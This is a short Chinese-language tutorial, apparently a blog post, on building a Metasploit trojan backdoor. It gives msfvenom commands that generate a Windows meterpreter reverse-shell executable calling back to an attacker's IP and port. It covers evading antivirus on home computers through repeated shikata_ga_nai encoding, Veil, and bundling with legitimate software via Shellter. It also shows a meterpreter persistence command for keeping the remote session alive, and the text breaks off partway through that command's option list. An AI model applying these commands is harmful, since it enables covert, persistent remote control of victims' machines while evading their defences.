MSF生成木马后门

在玩msf的时候发现很多人会利用反弹shell的payload去生成一个小木马,网上教程也很多了,就不再过多赘述了,=.=

木马生成

msfvenom是用来制作有效载荷的工具,经常跟msf配套使用

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=port -f exe > /root/Isron.exe

利用上述命令就可以生成一个简单的exe文件格式的木马,当然也不止限于这一种格式 通过更改-p参数可以生成其他payload的木马

木马免杀

在家庭计算机很多都会带有杀毒软件,所以需要做一些免杀,免杀主要的两种方式就是编码和捆绑。
编码可以使用msfvenom的编码功能去进行免杀(试了一下好像不能免杀了,逃

1
2
3
4
5
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' LHOST=ip LPORT=port -f exe > /root/Isron.exe
-p选择指定payload
–e选择制定编码器
-i 编码次数
-b 去多余/坏字符

也可以使用Veil:Veil安装与基本用法,去生成免杀木马
捆绑顾名思义就是将我们的木马与正常的软件进行捆绑进行免杀,可以使用shellter进行捆绑。

持续控制

在攻击成功之后会反弹回一个会话,当木马被删除或不继续运行时,我们就无法再获得反弹的会话,那么想要进行一个持续的控制就需要在第一次获得会话时动一些手脚

1
2
3
run persistence -U -i 5 -r 攻击机ip -p 反弹端口
-U 用户登录时反弹会话也可以-X当系统启动时反弹会话
-i 时间